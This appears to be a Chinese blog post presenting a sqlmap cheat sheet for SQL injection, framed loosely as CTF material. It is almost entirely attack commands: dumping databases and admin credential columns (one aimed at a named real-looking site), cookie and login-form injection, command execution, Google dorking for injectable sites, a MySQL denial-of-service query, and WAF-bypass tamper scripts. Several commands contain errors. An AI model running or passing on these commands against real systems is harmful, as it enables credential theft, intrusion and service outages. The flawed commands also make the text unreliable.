sqlmap的使用方法 --ctf

本文详细介绍如何使用SQLMap进行SQL注入攻击的各种技巧,包括普通注入、Cookie注入、POST登录框注入等,并介绍了如何利用SQLMap进行数据库操作,如查找库名、表名、列名以及数据内容。

普通注入

Sqlmap -u “http://www.xxxxxx.com/xxxx/xxx/xxx.xxx?xx=xx” --dbs

找到一个sql的注入点 探测他的库名   access的直接探表名

Sqlmap -u “http://”http://www.xxxxxx.com/xxxx/xxx/xxx.xxx?xx=xx” -D 探测出来的库名 --tables

探测库名后探测表名

Sqlmap -u “http://”http://www.xxxxxx.com/xxxx/xxx/xxx.xxx?xx=xx” -D 探测出来的库名 -T 探测出来的表名 --columns

探测他的列名

sqlmap -u "http://www.riyuba.com/news/index.asp?cataid=241" --dump -T admin -C "user,pwd"

探他的数据

cookie注入

一般有验证的注入会导致我们的注入失败有些网站经常提示一些禁止填写update delete等的字样这个时候普通的sql就不好用了

这时候可以试试cookie注入

Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx” --cookie “id=9” --dbs 

查库

Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx” --cookie “id=9” --table --level 2

查表

Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx” --cookie “id=9” --columns -T admin --level 2

查字段

Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx” --cookie “id=9” --dump -T admin -C “username,passwd” --level 2

查内容

Post登录框注入

注入点 “http://www.xxx.xxx.xxx/xxx/xxx/login.xxx”

首先将这个登陆界面用burpsuite截下来保存成一个txt的文本,然后指定变量

./sqlmap.py -r 保存的txt文本 -p 指定的参数

或者自动搜索表单的形式

Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx/login.xxx” --forms

Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx/login.xxx” --data “tfusermane=1111&tfpasswd=1111”

上一行的user和pass是指定的参数部分是要抓玩包看才知道的。

Sqlmap ——交互写shell及命令执行

Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx/login.xxx” --cs-cmd=ifconfig

后面可能需要 填写什么样的环境php asp jsp 的选择   然后在填写一下根目录地址

伪静态注入

Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx.html” --dbs

探测数据库

请求延时注入

Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx.html”  --delay 1

后面的1表示的是隔一秒继续访问这个页面

Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx.html”  --safe-freq 3

安全的频率为3次每秒 

Google的注入搜索

Sqlmap -g inurl:php? Id=

用google的搜索引擎自动取匹配url php环境 后面有id=xxx的网站

Mysql的dos攻击

Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx.html” --sql-shell

首先在知道这个注入点之后我们先获取一下他的shell

Select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)

在shell下可以用这条语句可以使数据库报错重启

绕过waf(利用脚本)注:不同的脚本针对的数据库也不同

Sqlmap -u “http://www.xxxxxx.com/xxxx/xxx/xxx.xxx?xx=xx” -v 3 --dbs --batch --tamper ‘space2morehash.py’

Space2hash.py             base64encode.py           charencode.py

这三个脚本是sqlmap自带的绕waf脚本各自的编码方式也不同

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

时光凉春衫薄

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值